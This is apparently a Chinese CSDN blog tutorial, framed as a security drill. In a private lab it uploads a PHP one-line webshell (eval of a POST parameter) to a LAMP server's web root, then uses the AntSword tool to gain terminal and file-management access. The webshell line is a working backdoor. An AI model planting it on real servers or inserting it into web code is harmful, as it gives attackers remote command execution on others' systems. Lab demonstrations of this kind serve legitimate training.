网络安全演练(一句话木马)

在享受互联网带来的便利的同时,也充满了各种网络安全风险,本文通过搭建实验环境,演示一句话木马获取主机权限。

演示环境

服务端:安装LAMP环境,部署web网站,上传一句话木马文件

客户端:安装AntSword(蚁剑)

环境准备

服务器准备

基本信息

操作系统:centos7

ip:192.168.21.131

网站部署:LAMP

方法一:XAMPP部署,参考--php开发环境部署(xampp)-CSDN博客

方法二:宝塔面板部署,参考--宝塔面板(服务器管理)-CSDN博客

制作一句话木马文件

文件名:ant.php

文件内容:<?php @eval($_POST['php']); ?>

客户端准备

基本信息

操作系统:windows 10

ip:192.168.21.130

安装蚁剑渗透测试工具

参考:渗透测试工具(AntSword)-CSDN博客

演示

centos7系统,采用XAMPP安装方式已部署好LAMP环境

bash 复制代码
[root@192 ~]# /opt/lampp/lampp status
Version: XAMPP for Linux 8.2.4-0
Apache is running.
MySQL is running.
ProFTPD is running.

页面访问正常

将ant.php文件上传到网站根目录

本次演示为手动将文件上传到网站根目录,也可以部署dvwa渗透测试环境,通过文件上传功能上传木马文件,本文不作演示

dvwa渗透测试环境部署参考:dvwa渗透测试环境部署-CSDN博客

bash 复制代码
[root@192 ~]# cat /opt/lampp/htdocs/ant.php 
<?php @eval($_POST['php']); ?>
[root@192 ~]# 

浏览器访问ant.php文件,状态码返回200

客户端电脑打开"蚁剑"工具,添加数据"http://192.168.21.131/ant.php"

在空白处右击,然后点击"添加数据"

如下图所示,填写url地址和密码(一句话木马文件中定义的密码"php"),然后依次点击"测试连接"和"添加"

右击选中的数据,然后点击"虚拟终端"

获取到了终端权限

右击选中数据,点击"文件管理"

获取了文件管理权限

总结

网络安全风险无处不在,我们应当加强防护,但也不必太过担心,网络攻击成功必须天时地利人和,只要我们做好安全防护,也不会轻易被攻击。

内容导览:计算机网络基础、进阶、安全实践

相关推荐
晓数4 分钟前
【硬核干货】SonarQube安全功能
安全·sonarqube·sonar
时迁24717 分钟前
【计算机网络】TCP的四种拥塞控制算法
网络·tcp/ip·计算机网络
数据与人工智能律师44 分钟前
正确应对监管部门的数据安全审查
大数据·网络·数据库·人工智能·区块链
Black_Rock_br2 小时前
智驭未来:NVIDIA自动驾驶安全白皮书与实验室创新实践深度解析
人工智能·安全·自动驾驶
网络工程师_ling2 小时前
【WLAN】华为无线AC双机热备负载分担—双链路热备份
运维·网络
Synfuture阳途3 小时前
网络准入控制系统:2025年网络安全的坚固防线
网络·安全·web安全
科技小E3 小时前
EasyRTC音视频实时通话在线教育解决方案:打造沉浸式互动教学新体验
网络·音视频
陈奕昆3 小时前
6.1腾讯技术岗2025面试趋势前瞻:大模型、云原生与安全隐私新动向
算法·安全·云原生·面试·腾讯
网络工程师_ling3 小时前
【华为】防火墙双击热备-之-主备模式-单外网线路-分享
网络
猪猪侠|ZZXia4 小时前
# 家庭网络IPv6地址的一些知识
linux·运维·服务器·网络·智能路由器